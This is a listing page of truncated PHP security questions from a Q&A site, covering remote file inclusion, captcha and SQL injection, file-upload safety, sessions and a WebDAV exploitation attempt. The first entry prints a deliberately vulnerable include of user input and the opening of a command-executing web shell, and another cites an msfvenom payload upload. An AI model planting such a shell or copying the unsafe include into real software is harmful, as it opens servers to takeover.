PHP – Page 30 – WindowsTechs.com

Why php RFI works with .txt but non with .php?

Posted on October 17, 2020 by Maicake

BACKEND:
<?php $file = $_GET["file"];
include $file; ?>

bad.txt bad.php CONTENT:
<?php

if(isset($_REQUEST[‘cmd’])){
echo "<pre>";
$cmd = ($_REQUEST[‘cmd’]);
system($cmd);
… Continue reading Why php RFI works with .txt but non with .php?→

Can’t bypass filter

Posted on October 5, 2020 by Ryuzaki

Trying some malicious injection against bWAPP and came across bypass captcha
Filter validating captcha is
if($_POST["captcha_user"] == $_SESSION["captcha"])

Tried input 1′ || ‘2 but it doesn’t bypass logical condition… Continue reading Can’t bypass filter→

i got till moment when i do not know if it is secure!
If SQL injection is inserted into myTableTwo via safe PDO query will it make my query below SQL injection open? Is the query below safe?
$mysfield returns SHOW COLUMNS FROM myTable
myTa… Continue reading Can here be SQL Injection→

Can an empty uploaded file cause any security issues?

Posted on September 25, 2020 by Nobody

The php.net page on the move_uploaded_file() function contains a User Contributed Note which says,

Security tips you must know before use this function:
First: make sure that the file is not empty.

I really cannot see how an empty file c… Continue reading Can an empty uploaded file cause any security issues?→

Handling file uploads securely in phpmailer/php

Posted on September 24, 2020 by Sarcasm

I have a lengthy HTML form with around 20-26 file uploads required and some of them are even multiple. I am really concerned about how secure it is. I would really like to have some secure solution to it.
I am using phpmailer for my projec… Continue reading Handling file uploads securely in phpmailer/php→

is this php code protect json hacking and hijacking? [closed]

Posted on September 24, 2020 by Beginner

i’m creating an android app for envato. before submitting my application to envato market, i want to be sure about my security. i’m collecting json data from mysql server and there in no data for username or password. i just parsing some l… Continue reading is this php code protect json hacking and hijacking? [closed]→

Securly uploading videos in PHP [migrated]

Posted on September 7, 2020 by ron wizzle

This question is about letting a potentially malicious user upload videos to your site – specifically, handling the file itself.
With images, one one simple thing you do (after every other thing is validated) is
if( $uploaded_type == ‘… Continue reading Securly uploading videos in PHP [migrated]→

I saw a folder today on my hosting "ogretmenevi" with an executable php file [closed]

Posted on September 5, 2020 by Syed

I saw a folder while browsing my cpanel, "ogretmenevi", this folder contains js directory and in that dir a .php file named bootstrap.php in which there was a cURL hit and some form and a download button. When I searched the word… Continue reading I saw a folder today on my hosting "ogretmenevi" with an executable php file [closed]→

How does proper use of session.use_only_cookies and session_regenerate_id() cause personal DoS?

Posted on August 26, 2020 by Kyoma

From PHP Session Management basics:

Proper use of session.use_only_cookies and session_regenerate_id() can
cause personal DoS with undeletable cookies set by attackers. In this
case, developers may invite users to remove cookies and advis… Continue reading How does proper use of session.use_only_cookies and session_regenerate_id() cause personal DoS?→

Exploiting WebDav [closed]

Posted on August 25, 2020 by Abhirup Bakshi

I’m trying to exploit webdav by uploading a msfvenom generated php script to the target webdav server on windows xp machine using the default credentials – wampp(username), xampp(password).
The command for generating the payload is: msfven… Continue reading Exploiting WebDav [closed]→